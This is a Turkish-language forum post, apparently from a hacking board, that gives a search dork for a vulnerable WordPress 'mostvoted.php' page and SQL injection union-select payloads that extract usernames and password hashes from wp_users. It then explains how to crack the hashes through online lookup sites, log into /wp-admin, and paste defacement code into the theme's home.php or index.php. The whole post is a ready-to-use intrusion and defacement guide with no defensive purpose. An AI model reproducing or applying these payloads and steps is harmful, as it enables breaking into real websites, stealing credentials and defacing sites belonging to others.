Dork ; inurl:"mostvoted.php?pid="
Exploit(Kullanıcı Adı); mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Exploit(Şifre); mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users
Genellikle Kullanılan Panel Yolu; /wp-login.php veya /wp-admin
xx yazan yerlere girdiğiniz sitedeki "pid=" den sonraki sayıyı yazın (- sembolünü silmeyin) devamınada exploitin devamını yazın enter'layın.Kullanıcı adı ve şifrenizi alın.
Şimdi $P$ bi ifadeyle karşılaşıcaksınız.Şifreyi alırken.Mesela bi örnek üzerinden anlatıyorum...
$P$9eg1yrUz9h2Yf/31hFAtCGCJC.1zcM1
Şimdi bunu nasıl kırıcaksınız.şu adrese girin.
Hashchecker.de - Passwrter finden!
Hashfinden yazıyo oraya tıklayın.Bunu yapıştırın ama öyle olduğu gibi değil.Önce şu şekilde düzenliyoruz.
$P$9eg1yrUz9h2Yf/31hFAtCGCJC.1zcM1
Şu kırmızıyla işaretlediğim noktayı kaldırıyosunuz.Ve senchen diyosunuz.Site size bi kaç yerinde asıl md5'i vericek.
md5.rednoize.com
md5.thekaine.de
bu iki yerde size MD5 vericek.bu MD5'leride yine hashchecker'da Hash Finden yerinden kırabilirsiniz.Bi site daha söyliyim işniz sağlama alın.
md5cracker.org | The Cracking Engine for MD5-Hashes
Şifreyide bu şekilde kıurdıktan sonra artık panelden siteye girebilirsiniz.Girdiğinizde ne yapıcaksınız.Hemen onuda söyliyim ana sayfa index basabilmeniz için.Ben daha önce WordPress kullandım ondan biliyorum.Soldaki araçlar yeriydi yanlış hatırlamıyosam ordan editör yerini bulun.Sonra gelen sayfada solda dosyalar olucak.Onlardan home.php olana girin index kodlarınız yapıştırın.Büyük ihtimalle olucak.Küçük bi ihtimal olmassa bide index.php var orda aynısını yapın




LinkBack URL
About LinkBacks
Alıntı ile Cevapla

Bu Konuyu Paylaşın !